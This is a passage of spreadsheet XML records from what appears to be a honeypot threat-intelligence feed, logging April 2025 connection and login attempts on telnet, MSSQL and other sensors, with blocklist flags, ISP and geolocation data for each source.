    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:9643"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2688"/>
    <x v="2688"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T18:06:17"/>
    <d v="2025-04-07T18:06:17"/>
    <d v="2025-04-07T18:06:17"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb1:6f81"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2689"/>
    <x v="2689"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T18:00:54"/>
    <d v="2025-03-23T06:47:58"/>
    <d v="2025-04-07T18:00:54"/>
    <n v="27"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="ET"/>
    <s v="Ethiopia"/>
    <s v="AA"/>
    <s v="Addis Ababa"/>
    <s v="Arada"/>
    <s v="Addis Ababa"/>
    <s v="344979"/>
    <s v="NA"/>
    <s v="9.02427"/>
    <s v="38.7519"/>
    <s v="24757"/>
    <s v="EthioNet"/>
    <s v="Ethiotelecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c4be:45ca"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2690"/>
    <x v="2690"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T17:58:10"/>
    <d v="2025-04-07T17:56:35"/>
    <d v="2025-04-07T17:58:10"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="cellular"/>
    <s v="BSNL BBoWIFI services"/>
    <s v="2007-08-01"/>
    <s v="BBoWIFI"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c6:86b5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2691"/>
    <x v="2691"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T17:52:42"/>
    <d v="2025-04-07T17:52:42"/>
    <d v="2025-04-07T17:52:42"/>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b:e579"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2692"/>
    <x v="2692"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T17:48:41"/>
    <d v="2025-04-07T10:09:48"/>
    <d v="2025-04-07T17:48:41"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="2010-03-11"/>
    <s v="HATHWAY-AP"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b05:1a97"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2693"/>
    <x v="2693"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T17:47:21"/>
    <d v="2025-04-07T17:47:21"/>
    <d v="2025-04-07T17:47:21"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5b:f405"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2694"/>
    <x v="2694"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T17:29:54"/>
    <d v="2025-04-07T17:27:05"/>
    <d v="2025-04-07T17:29:54"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Darjeeling"/>
    <s v="Siliguri"/>
    <s v="1256525"/>
    <s v="734001"/>
    <s v="26.7271"/>
    <s v="88.3953"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d6:80a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2695"/>
    <x v="2695"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T17:29:02"/>
    <d v="2023-12-04T08:29:00"/>
    <d v="2025-04-07T17:29:02"/>
    <n v="309"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;52706&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="CO"/>
    <s v="Colombia"/>
    <s v="DC"/>
    <s v="Bogota D.C."/>
    <s v="Bogotá  D.C."/>
    <s v="Bogotá (Suba)"/>
    <s v="3688689"/>
    <s v="111111"/>
    <s v="4.69732"/>
    <s v="-74.0697"/>
    <s v="3816"/>
    <s v="COLOMBIA TELECOMUNICACIONES S.A. ESP"/>
    <s v="Colombia Telecomunicaciones S.a. ESP"/>
    <s v="business"/>
    <s v="Colombia Telecomunicaciones S.a. ESP"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ba76:79df"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2696"/>
    <x v="2696"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T17:20:46"/>
    <d v="2025-04-07T17:20:46"/>
    <d v="2025-04-07T17:20:46"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b06:f2ea"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2697"/>
    <x v="2697"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T17:19:15"/>
    <d v="2025-04-07T17:19:15"/>
    <d v="2025-04-07T17:19:15"/>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f8:a3da"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2698"/>
    <x v="2698"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T17:14:11"/>
    <d v="2025-04-07T17:14:11"/>
    <d v="2025-04-07T17:14:11"/>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d9:2914"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2699"/>
    <x v="2699"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T17:11:46"/>
    <d v="2025-04-07T17:11:46"/>
    <d v="2025-04-07T17:11:46"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ff:1fb5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2700"/>
    <x v="2700"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T17:01:22"/>
    <d v="2025-04-07T07:02:49"/>
    <d v="2025-04-07T17:01:22"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cd:986f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2701"/>
    <x v="2701"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T16:55:49"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-07T16:55:49"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'korea.services.net': ['unknown']}"/>
    <n v="64"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Korea Telecom"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:afd5:d51a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2702"/>
    <x v="2702"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T16:30:07"/>
    <d v="2025-04-07T16:23:19"/>
    <d v="2025-04-07T16:30:07"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f1:d1f0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2703"/>
    <x v="2703"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T16:25:31"/>
    <d v="2024-07-09T00:07:00"/>
    <d v="2025-04-07T16:25:31"/>
    <n v="33"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H35"/>
    <s v="1433&amp;&amp;23&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Kapurthala"/>
    <s v="Phagwāra"/>
    <s v="1259827"/>
    <s v="NA"/>
    <s v="31.2245"/>
    <s v="75.7739"/>
    <s v="17917"/>
    <s v="Quadrant Televentures Limited"/>
    <s v="Quadrant Televentures Limited"/>
    <s v="residential"/>
    <s v="Hfcl Infotel LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:70c4:3e07"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2704"/>
    <x v="2704"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T16:19:01"/>
    <d v="2025-04-07T16:19:01"/>
    <d v="2025-04-07T16:19:01"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b05:29e3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2705"/>
    <x v="2705"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T16:17:23"/>
    <d v="2025-01-09T13:06:04"/>
    <d v="2025-04-07T16:17:23"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="S.A.S Nagar"/>
    <s v="Mohali"/>
    <s v="6992326"/>
    <s v="NA"/>
    <s v="30.68"/>
    <s v="76.7221"/>
    <s v="17917"/>
    <s v="Quadrant Televentures Limited"/>
    <s v="Hfcl Infotel LTD"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2009-02-11"/>
    <s v="BroadBand_Customers_New_Town"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:70c4:2b92"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2706"/>
    <x v="2706"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T15:58:59"/>
    <d v="2024-07-08T09:55:00"/>
    <d v="2025-04-07T15:58:59"/>
    <n v="28"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_SOCKS5_H25&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SSH_H26&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_MYSQL_H2&amp;&amp;SMA-LAB_SMB_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;80&amp;&amp;1080&amp;&amp;443&amp;&amp;389&amp;&amp;445&amp;&amp;51389&amp;&amp;1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="NP"/>
    <s v="Nepal"/>
    <s v="P3"/>
    <s v="Bagmati Province"/>
    <s v="Kathmandu"/>
    <s v="Kathmandu"/>
    <s v="1283240"/>
    <s v="NA"/>
    <s v="27.7017"/>
    <s v="85.3206"/>
    <s v="17501"/>
    <s v="WorldLink Communications"/>
    <s v="WorldLink Communications"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2005-06-10"/>
    <s v="WLINK_FIBER_STATIC_IP_SUBNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
